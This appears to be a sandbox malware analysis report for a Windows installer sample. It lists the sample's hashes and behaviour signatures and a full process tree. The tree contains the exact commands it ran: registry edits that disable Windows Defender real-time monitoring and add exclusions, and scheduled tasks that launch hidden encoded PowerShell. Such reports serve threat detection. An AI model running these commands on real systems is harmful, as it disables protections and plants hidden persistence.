Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
142s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
30/10/2022, 07:18
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
85958167182b4b3c8371e07bf013c106
-
SHA1
43a324cb996b484b07cbb912b05bd40c1a269b86
-
SHA256
eecec3fe3c1ad913f535fd2d101b441faffc90973a7951e2673324041f439da4
-
SHA512
76cff807de7a6425812e7da38cb4f8f232b68746b6fd087ce6fb09e7259169d659e17e4968d440d767002763b739d0bc186ee67613cf23089650feffa9bea9bf
-
SSDEEP
196608:91O01nQ0bnj+fYrCohkD3T6o4BUpWet7KZ9IWU:3Os9n8hf6rBPetapU
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
Windows security bypass 2 TTPs 36 IoCs
-
Executes dropped EXE 3 IoCs
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 8 IoCs
-
Drops file in System32 directory 8 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 8 IoCs
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS5E18.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS6C89.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gCruHhvjx" /SC once /ST 04:59:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gCruHhvjx"4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gCruHhvjx"4⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "btUIxhnquogiJgiDhn" /SC once /ST 08:20:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\hKdaKKmxcqpbfbjVy\zFuvCIvdFPfOMYj\kyQNCcc.exe\" hC /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {140586B7-9E02-436B-B39B-07050E09A6D2} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {10755D13-5A45-40FA-BE5F-0549598F5332} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\hKdaKKmxcqpbfbjVy\zFuvCIvdFPfOMYj\kyQNCcc.exeC:\Users\Admin\AppData\Local\Temp\hKdaKKmxcqpbfbjVy\zFuvCIvdFPfOMYj\kyQNCcc.exe hC /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gCrjbapTf" /SC once /ST 02:06:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gCrjbapTf"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gCrjbapTf"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gCWubUQmV" /SC once /ST 00:22:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gCWubUQmV"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gCWubUQmV"3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PJXqPLeKMmGmmJnl" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PJXqPLeKMmGmmJnl" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PJXqPLeKMmGmmJnl" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PJXqPLeKMmGmmJnl" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PJXqPLeKMmGmmJnl" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PJXqPLeKMmGmmJnl" /t REG_DWORD /d 0 /reg:324⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PJXqPLeKMmGmmJnl" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PJXqPLeKMmGmmJnl" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\PJXqPLeKMmGmmJnl\RtULkbOx\DAHtlBpJfVPXVOlN.wsf"3⤵
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\PJXqPLeKMmGmmJnl\RtULkbOx\DAHtlBpJfVPXVOlN.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DGyuesllMrTyYUlUupR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DGyuesllMrTyYUlUupR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GUqtXLpkCnEU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GUqtXLpkCnEU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RjxgDONkleUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RjxgDONkleUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XjmuJHxLjXQtC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XjmuJHxLjXQtC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHfaALlsU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHfaALlsU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pjzNRCemcPOgEmVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pjzNRCemcPOgEmVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\hKdaKKmxcqpbfbjVy" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\hKdaKKmxcqpbfbjVy" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PJXqPLeKMmGmmJnl" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PJXqPLeKMmGmmJnl" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DGyuesllMrTyYUlUupR" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DGyuesllMrTyYUlUupR" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GUqtXLpkCnEU2" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GUqtXLpkCnEU2" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RjxgDONkleUn" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RjxgDONkleUn" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XjmuJHxLjXQtC" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XjmuJHxLjXQtC" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHfaALlsU" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bHfaALlsU" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pjzNRCemcPOgEmVB" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\pjzNRCemcPOgEmVB" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\hKdaKKmxcqpbfbjVy" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\hKdaKKmxcqpbfbjVy" /t REG_DWORD /d 0 /reg:644⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PJXqPLeKMmGmmJnl" /t REG_DWORD /d 0 /reg:324⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PJXqPLeKMmGmmJnl" /t REG_DWORD /d 0 /reg:644⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gUwXTVKVN" /SC once /ST 05:51:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gUwXTVKVN"3⤵
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.2MB
MD5d5a27be6c21a41889e0dc8da0ba298de
SHA170fb4bcb9466094ed13356d20f71178a5158aca7
SHA256f983cbfa81f9225628bd1d70549ea7fe381463bc576c0d5e206242e8326364d4
SHA5127bb39fc58969cd83d3e9b539881f1b2ddd8a701b4f0a93d06079539002bf5cf23d0f8f5b8c3e8c502dd7d57d1e9cf6cb49b9acc729d54e32f56c4159499eb077
-
Filesize
6.2MB
MD5d5a27be6c21a41889e0dc8da0ba298de
SHA170fb4bcb9466094ed13356d20f71178a5158aca7
SHA256f983cbfa81f9225628bd1d70549ea7fe381463bc576c0d5e206242e8326364d4
SHA5127bb39fc58969cd83d3e9b539881f1b2ddd8a701b4f0a93d06079539002bf5cf23d0f8f5b8c3e8c502dd7d57d1e9cf6cb49b9acc729d54e32f56c4159499eb077
-
Filesize
6.7MB
MD500c710c994824148ee5f5799a6981a40
SHA165a9e3f4e2a9eddf27f357812838b6a06b019292
SHA25603911a567982d4d0168a075782bdd0a3f52e6d9c11d67ef259e1ba565c30768f
SHA51265e67ea54f4248c2e84771d4c221bb8680bb1b68a86888219cb4b492f439f15d933603ceb63627f1aa0a1cd57af25dab4a390cebd13415aaf70cdb383e3e4d1d
-
Filesize
6.7MB
MD500c710c994824148ee5f5799a6981a40
SHA165a9e3f4e2a9eddf27f357812838b6a06b019292
SHA25603911a567982d4d0168a075782bdd0a3f52e6d9c11d67ef259e1ba565c30768f
SHA51265e67ea54f4248c2e84771d4c221bb8680bb1b68a86888219cb4b492f439f15d933603ceb63627f1aa0a1cd57af25dab4a390cebd13415aaf70cdb383e3e4d1d
-
Filesize
6.7MB
MD500c710c994824148ee5f5799a6981a40
SHA165a9e3f4e2a9eddf27f357812838b6a06b019292
SHA25603911a567982d4d0168a075782bdd0a3f52e6d9c11d67ef259e1ba565c30768f
SHA51265e67ea54f4248c2e84771d4c221bb8680bb1b68a86888219cb4b492f439f15d933603ceb63627f1aa0a1cd57af25dab4a390cebd13415aaf70cdb383e3e4d1d
-
Filesize
6.7MB
MD500c710c994824148ee5f5799a6981a40
SHA165a9e3f4e2a9eddf27f357812838b6a06b019292
SHA25603911a567982d4d0168a075782bdd0a3f52e6d9c11d67ef259e1ba565c30768f
SHA51265e67ea54f4248c2e84771d4c221bb8680bb1b68a86888219cb4b492f439f15d933603ceb63627f1aa0a1cd57af25dab4a390cebd13415aaf70cdb383e3e4d1d
-
Filesize
7KB
MD57079ff678f8d9139f1ca6b6f7b8efe8e
SHA15a7a537608f87cf593a4145bf1f5d34a395bef8e
SHA256da7c5c1e17e32423378963954319cea4a6bc83d0bf806e4e9e1f81318f070710
SHA5120e15d8719c219e9a0c9563f00dee117bd5b03efde278ab0bd562e6c8dcc29994ca71706b7cfa431f0827e534066be40540ca0ff95263a1b7d4183dd9460dd40a
-
Filesize
7KB
MD50f43b71bd41cabd2a6cd0c7bda88ae7e
SHA13016fa22a3a6b6502e070923a5bc2b4879b6cc61
SHA256df17b97a4636bc295b7452551204d55a1859fb78a044f1d59329fc5d0cdd3a44
SHA5123b205bf353f3b9a6313f955110699deb72785f47e75382fef41679b173e1f330dd6b83d63e95f61991ae6237e645ed57adb38a68aa4e021fd86616c7c8c4f515
-
Filesize
7KB
MD5f78a719ca1f9641a3a873cd5e492dec2
SHA104452d139a12e994c70df9b3993baa2dfc2e41c9
SHA2561795f5cde68ef84229a2f69cf15c9f0694b0b423aeb3368cafead559d7a54791
SHA512a3e0c7cc762436c8c8e91f9356b572a6db6401efac03ad8e905fca4f0b7ff9bc83da2c8d670fd97decb97d620a59fa63c768975188649767f7c40926f45c87a6
-
Filesize
8KB
MD5dd94075573922d8a21c2cbff155ff2ea
SHA16646dfa0f63dd20f787ba5411c69ac31fc85a3e3
SHA256ab3ac388fb758e99467145b1ebb32db22289e993f941422a6d6c282b9acb42ea
SHA5124c368729ebc7464bae903cd2a90bb88011c87180fee437653a9075d14750c858ce0c343b8d13bedfe39e1473d57d7c29362909e203563af7d4809491f1e95207
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.2MB
MD5d5a27be6c21a41889e0dc8da0ba298de
SHA170fb4bcb9466094ed13356d20f71178a5158aca7
SHA256f983cbfa81f9225628bd1d70549ea7fe381463bc576c0d5e206242e8326364d4
SHA5127bb39fc58969cd83d3e9b539881f1b2ddd8a701b4f0a93d06079539002bf5cf23d0f8f5b8c3e8c502dd7d57d1e9cf6cb49b9acc729d54e32f56c4159499eb077
-
Filesize
6.2MB
MD5d5a27be6c21a41889e0dc8da0ba298de
SHA170fb4bcb9466094ed13356d20f71178a5158aca7
SHA256f983cbfa81f9225628bd1d70549ea7fe381463bc576c0d5e206242e8326364d4
SHA5127bb39fc58969cd83d3e9b539881f1b2ddd8a701b4f0a93d06079539002bf5cf23d0f8f5b8c3e8c502dd7d57d1e9cf6cb49b9acc729d54e32f56c4159499eb077
-
Filesize
6.2MB
MD5d5a27be6c21a41889e0dc8da0ba298de
SHA170fb4bcb9466094ed13356d20f71178a5158aca7
SHA256f983cbfa81f9225628bd1d70549ea7fe381463bc576c0d5e206242e8326364d4
SHA5127bb39fc58969cd83d3e9b539881f1b2ddd8a701b4f0a93d06079539002bf5cf23d0f8f5b8c3e8c502dd7d57d1e9cf6cb49b9acc729d54e32f56c4159499eb077
